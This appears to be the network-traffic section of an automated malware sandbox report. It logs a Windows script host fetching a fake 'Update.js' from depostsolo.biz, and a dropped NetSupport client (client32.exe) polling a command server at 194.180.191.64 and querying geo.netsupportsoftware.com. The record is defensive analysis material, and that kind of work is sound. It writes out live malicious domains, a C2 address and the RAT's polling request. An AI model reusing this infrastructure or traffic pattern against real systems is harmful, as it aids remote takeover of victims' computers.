                                                                                                                                                                              Dec 17, 2024 18:13:00.332295895 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:00.332323074 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:13:00.332328081 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:00.332361937 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:13:00.332395077 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:13:00.359215021 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:00.359392881 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:13:00.362293959 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:00.362369061 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:13:00.365659952 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:00.365741014 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:13:00.368864059 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:00.368937969 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:13:00.453572035 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:00.453651905 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:13:00.456454992 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:00.456545115 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:13:00.459373951 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:00.459450960 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:13:00.462249994 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:00.462342024 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:13:00.465147018 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:00.465224981 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:13:00.468038082 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:00.468106031 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:13:00.470032930 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:00.470103979 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:13:00.473855972 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:00.473926067 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:13:00.476289988 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:00.476353884 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:13:00.479331970 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:00.479409933 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:13:00.482144117 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:00.482213974 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:13:00.485009909 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:00.485100985 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:13:00.566479921 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:00.566548109 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:13:00.568737984 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:00.568802118 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:13:00.572499037 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:00.572556973 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:13:00.575385094 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:00.575444937 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:13:00.579466105 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:00.579523087 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:13:00.582684994 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:00.582741976 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:13:00.586009026 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:00.586071968 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:13:00.588146925 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:00.588196993 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:13:00.588205099 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:00.588226080 CET4434973898.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:00.588246107 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:13:00.588274002 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:13:00.588274002 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:13:00.588300943 CET49738443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:13:02.850193024 CET49739443192.168.2.4194.180.191.64
                                                                                                                                                                              Dec 17, 2024 18:13:02.850244999 CET44349739194.180.191.64192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:02.850491047 CET49739443192.168.2.4194.180.191.64
                                                                                                                                                                              Dec 17, 2024 18:13:02.930103064 CET49739443192.168.2.4194.180.191.64
                                                                                                                                                                              Dec 17, 2024 18:13:02.930136919 CET44349739194.180.191.64192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:02.930255890 CET44349739194.180.191.64192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:03.300184011 CET4974080192.168.2.4104.26.0.231
                                                                                                                                                                              Dec 17, 2024 18:13:03.423410892 CET8049740104.26.0.231192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:03.423716068 CET4974080192.168.2.4104.26.0.231
                                                                                                                                                                              Dec 17, 2024 18:13:03.424057007 CET4974080192.168.2.4104.26.0.231
                                                                                                                                                                              Dec 17, 2024 18:13:03.543647051 CET8049740104.26.0.231192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:04.771646976 CET8049740104.26.0.231192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:04.774599075 CET4974080192.168.2.4104.26.0.231
                                                                                                                                                                              Dec 17, 2024 18:13:04.836925030 CET4974080192.168.2.4104.26.0.231
                                                                                                                                                                              Dec 17, 2024 18:13:04.836956978 CET4974080192.168.2.4104.26.0.231
                                                                                                                                                                              Dec 17, 2024 18:13:04.839123964 CET4974180192.168.2.4104.26.0.231
                                                                                                                                                                              Dec 17, 2024 18:13:04.958856106 CET8049741104.26.0.231192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:04.958946943 CET4974180192.168.2.4104.26.0.231
                                                                                                                                                                              Dec 17, 2024 18:13:04.959523916 CET4974180192.168.2.4104.26.0.231
                                                                                                                                                                              Dec 17, 2024 18:13:05.079767942 CET8049741104.26.0.231192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:06.285134077 CET8049741104.26.0.231192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:06.285208941 CET4974180192.168.2.4104.26.0.231
                                                                                                                                                                              Dec 17, 2024 18:13:06.317769051 CET4974180192.168.2.4104.26.0.231
                                                                                                                                                                              Dec 17, 2024 18:13:06.317811012 CET4974180192.168.2.4104.26.0.231
                                                                                                                                                                              Dec 17, 2024 18:13:06.318465948 CET4974280192.168.2.4104.26.0.231
                                                                                                                                                                              Dec 17, 2024 18:13:06.438472986 CET8049742104.26.0.231192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:06.438615084 CET4974280192.168.2.4104.26.0.231
                                                                                                                                                                              Dec 17, 2024 18:13:06.439069033 CET4974280192.168.2.4104.26.0.231
                                                                                                                                                                              Dec 17, 2024 18:13:06.561469078 CET8049742104.26.0.231192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:07.823870897 CET8049742104.26.0.231192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:07.823987007 CET4974280192.168.2.4104.26.0.231
                                                                                                                                                                              Dec 17, 2024 18:13:07.824558020 CET4974280192.168.2.4104.26.0.231
                                                                                                                                                                              Dec 17, 2024 18:13:07.824583054 CET4974280192.168.2.4104.26.0.231

                                                                                                                                                                              UDP Packets

                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                              Dec 17, 2024 18:12:22.892738104 CET6411453192.168.2.41.1.1.1
                                                                                                                                                                              Dec 17, 2024 18:12:23.406299114 CET53641141.1.1.1192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:53.391344070 CET5598853192.168.2.41.1.1.1
                                                                                                                                                                              Dec 17, 2024 18:12:54.211677074 CET53559881.1.1.1192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:13:03.149589062 CET6504253192.168.2.41.1.1.1
                                                                                                                                                                              Dec 17, 2024 18:13:03.287436008 CET53650421.1.1.1192.168.2.4

                                                                                                                                                                              DNS Queries

                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                              Dec 17, 2024 18:12:22.892738104 CET192.168.2.41.1.1.10xd12bStandard query (0)depostsolo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 17, 2024 18:12:53.391344070 CET192.168.2.41.1.1.10x2cadStandard query (0)businessinsanjose.infoA (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 17, 2024 18:13:03.149589062 CET192.168.2.41.1.1.10xade9Standard query (0)geo.netsupportsoftware.comA (IP address)IN (0x0001)false

                                                                                                                                                                              DNS Answers

                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                              Dec 17, 2024 18:12:23.406299114 CET1.1.1.1192.168.2.40xd12bNo error (0)depostsolo.biz98.142.240.215A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 17, 2024 18:12:54.211677074 CET1.1.1.1192.168.2.40x2cadNo error (0)businessinsanjose.info98.142.240.215A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 17, 2024 18:13:03.287436008 CET1.1.1.1192.168.2.40xade9No error (0)geo.netsupportsoftware.com104.26.0.231A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 17, 2024 18:13:03.287436008 CET1.1.1.1192.168.2.40xade9No error (0)geo.netsupportsoftware.com104.26.1.231A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 17, 2024 18:13:03.287436008 CET1.1.1.1192.168.2.40xade9No error (0)geo.netsupportsoftware.com172.67.68.212A (IP address)IN (0x0001)false

                                                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                                                              • depostsolo.biz
                                                                                                                                                                              • businessinsanjose.info
                                                                                                                                                                              • 194.180.191.64connection: keep-alivecmd=pollinfo=1ack=1
                                                                                                                                                                              • geo.netsupportsoftware.com

                                                                                                                                                                              HTTP Packets

                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              0192.168.2.449739194.180.191.644436024C:\ProgramData\4dvs23l\client32.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Dec 17, 2024 18:13:02.930103064 CET220OUTPOST http://194.180.191.64/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 194.180.191.64Connection: Keep-AliveCMD=POLLINFO=1ACK=1
                                                                                                                                                                              Data Raw:
                                                                                                                                                                              Data Ascii:


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              1192.168.2.449740104.26.0.231806024C:\ProgramData\4dvs23l\client32.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Dec 17, 2024 18:13:03.424057007 CET118OUTGET /location/loca.asp HTTP/1.1
                                                                                                                                                                              Host: geo.netsupportsoftware.com
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Dec 17, 2024 18:13:04.771646976 CET1130INHTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Tue, 17 Dec 2024 17:13:04 GMT
                                                                                                                                                                              Content-Type: text/html; charset=us-ascii
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              CF-Ray: 8f388aaa8aee5e74-EWR
                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                              cf-apo-via: origin,host
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kORzdyI%2BjEye5ENEo%2FibFIvNIkODj0vC%2FxDLTGGyjO1aUE8ILgFbAESqJK6NWPKV0uGVMEZWzoqTE09PItCstIXkKPzNrbGq4hc%2FkDEa6EmtlRstrfyZiv1%2F%2Bjb%2FDedX7duzVRkHUonPYjwx"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1659&min_rtt=1659&rtt_var=829&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=95&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                              Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              2192.168.2.449741104.26.0.231806024C:\ProgramData\4dvs23l\client32.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Dec 17, 2024 18:13:04.959523916 CET118OUTGET /location/loca.asp HTTP/1.1
                                                                                                                                                                              Host: geo.netsupportsoftware.com
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Dec 17, 2024 18:13:06.285134077 CET1131INHTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Tue, 17 Dec 2024 17:13:06 GMT
                                                                                                                                                                              Content-Type: text/html; charset=us-ascii
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              CF-Ray: 8f388ab3ef2e0f98-EWR
                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                              cf-apo-via: origin,host
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oAF%2FXXEytpJW2n6mJdpv%2FQO6IencmOUnvx9EDAWQr7K5zqlrDq8%2F8I5beGapiqH5h%2FqNPo6g6tFEgCTeT%2BirFiO55mQ%2F5ePimJczOf%2FijbNP3BdtKJ6q4eVbsffd3bvlEGJkaTzo0U9VhoaZ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1668&min_rtt=1668&rtt_var=834&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                              Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              3192.168.2.449742104.26.0.231806024C:\ProgramData\4dvs23l\client32.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Dec 17, 2024 18:13:06.439069033 CET118OUTGET /location/loca.asp HTTP/1.1
                                                                                                                                                                              Host: geo.netsupportsoftware.com
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Dec 17, 2024 18:13:07.823870897 CET1127INHTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Tue, 17 Dec 2024 17:13:07 GMT
                                                                                                                                                                              Content-Type: text/html; charset=us-ascii
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              CF-Ray: 8f388abd39a85b5f-IAD
                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                              cf-apo-via: origin,host
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vEuKB1MQQQfPYM%2FEbUKEIvVu2b036KmstI%2FHGUjJn7yPOmsNMKZ%2FKEbsvLz78koetwvK08Xx1q4WjNa6%2Bl3jwLhpFLeYJxIKKPOOVG3woB8PGXS1IwbzkXbT7iPT3vb%2FU37It5WfMJ8Wkwj8"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=8391&min_rtt=8391&rtt_var=4195&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                              Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0


                                                                                                                                                                              HTTPS Proxied Packets

                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              0192.168.2.44973198.142.240.2154436896C:\Windows\System32\wscript.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-17 17:12:25 UTC393OUTPOST /work/download.php?id=100&76794 HTTP/1.1
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              Accept-Language: en-ch
                                                                                                                                                                              UA-CPU: AMD64
                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                              Host: depostsolo.biz
                                                                                                                                                                              Content-Length: 5
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              2024-12-17 17:12:25 UTC5OUTData Raw: 31 31 41 51 3d
                                                                                                                                                                              Data Ascii: 11AQ=
                                                                                                                                                                              2024-12-17 17:12:25 UTC357INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Tue, 17 Dec 2024 17:12:25 GMT
                                                                                                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                              Content-Description: File Transfer
                                                                                                                                                                              Content-Disposition: attachment; filename=Update.js
                                                                                                                                                                              Content-Transfer-Encoding: binary
                                                                                                                                                                              Expires: 0
                                                                                                                                                                              Cache-Control: must-revalidate
                                                                                                                                                                              Pragma: public
                                                                                                                                                                              Content-Length: 14369946
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                              2024-12-17 17:12:25 UTC7835INData Raw: 2f 2a 2a 0a 20 2a 20 40 70 72 69 76 61 74 65 0a 20 2a 20 44 4f 20 4e 4f 54 20 52 45 4d 4f 56 45 0a 20 2a 20 62 72 6f 77 73 65 72 20 62 75 69 6c 64 65 72 20 77 69 6c 6c 20 73 74 72 69 70 20 6f 75 74 20 74 68 69 73 20 6c 69 6e 65 20 69 66 20 73 65 72 76 69 63 65 73 20 61 72 65 20 73 75 70 70 6c 69 65 64 20 6f 6e 20 74 68 65 20 63 6f 6d 6d 61 6e 64 20 6c 69 6e 65 2e 0a 20 2a 2f 0a 0a 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 6e 2c 74 29 7b 66 75 6e 63 74 69 6f 6e 20 6f 28 69 2c 66 29 7b 69 66 28 21 6e 5b 69 5d 29 7b 69 66 28 21 65 5b 69 5d 29 7b 76 61 72 20 63 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 26 26 72 65 71 75 69 72 65 3b 69 66 28 21 66 26 26 63 29 72 65 74 75 72 6e 20 63 28
                                                                                                                                                                              Data Ascii: /** * @private * DO NOT REMOVE * browser builder will strip out this line if services are supplied on the command line. */(function(){function r(e,n,t){function o(i,f){if(!n[i]){if(!e[i]){var c="function"==typeof require&&require;if(!f&&c)return c(
                                                                                                                                                                              2024-12-17 17:12:25 UTC357INData Raw: 20 20 20 20 20 20 20 22 45 78 70 6f 72 74 65 64 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 74 79 70 65 22 3a 20 22 62 6f 6f 6c 65 61 6e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 52 65 6e 65 77 61 6c 45 6c 69 67 69 62 69 6c 69 74 79 22 3a 20 7b 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 4e 6f 74 42 65 66 6f 72 65 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 74 79 70 65 22 3a 20 22 74 69 6d 65 73 74 61 6d 70 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 4e 6f 74 41 66 74 65 72 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22
                                                                                                                                                                              Data Ascii: "Exported": { "type": "boolean" }, "RenewalEligibility": {}, "NotBefore": { "type": "timestamp" }, "NotAfter": { "
                                                                                                                                                                              2024-12-17 17:12:25 UTC8192INData Raw: 61 6d 70 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 49 73 73 75 65 64 41 74 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 74 79 70 65 22 3a 20 22 74 69 6d 65 73 74 61 6d 70 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 49 6d 70 6f 72 74 65 64 41 74 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 74 79 70 65 22 3a 20 22 74 69 6d 65 73 74 61 6d 70 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 52 65 76 6f 6b 65 64 41 74 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 74 79 70 65 22
